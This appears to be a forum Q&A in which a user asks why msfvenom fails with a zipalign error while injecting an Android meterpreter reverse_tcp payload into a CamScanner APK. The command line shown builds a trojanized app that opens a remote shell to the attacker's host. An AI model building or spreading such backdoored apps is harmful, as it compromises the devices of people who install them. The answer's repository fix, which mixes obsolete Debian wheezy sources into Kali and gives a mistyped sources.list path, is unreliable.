# Error: zipalign not found. If it's not in your PATH, please add it

Tags: kali-linux, metasploit

when i try to inject payload in the apk this error occurs

```
root@kali:~# msfvenom -x /root/Documents/CamScanner_5.7.5.20180907.apk  -p android/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=2410 -o camscanner_main.apk
Using APK template: /root/Documents/CamScanner_5.7.5.20180907.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: zipalign not found. If it's not in your PATH, please add it.`
```

i even try apt-get install zipalign

```
root@kali:~# apt-get install zipalign
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Package zipalign is not available, but is referred to by another package.
This may mean that the package is missing,   
has been obsoleted, or is only available from another source`

E: Package 'zipalign' has no installation candidate
```

Comment: That looks like sloppy dependency tracking on the part of the packager, have you considered [filing a bug report?](https://docs.kali.org/community/submitting-issues-kali-bug-tracker)

Answer (score 1):

i found out fix

add these link to repository

```
nano /root/etc/apt/sources.list
```

and pastes these links

```
deb http://http.kali.org/kali kali-rolling main contrib non-free
deb-src http://http.kali.org/kali kali-rolling main contrib non-free

deb http://old.kali.org/kali sana main non-free contrib

deb http://ftp.de.debian.org/debian wheezy main
```

and try these commands

```
apt-get update 
apt-get install zipalign
```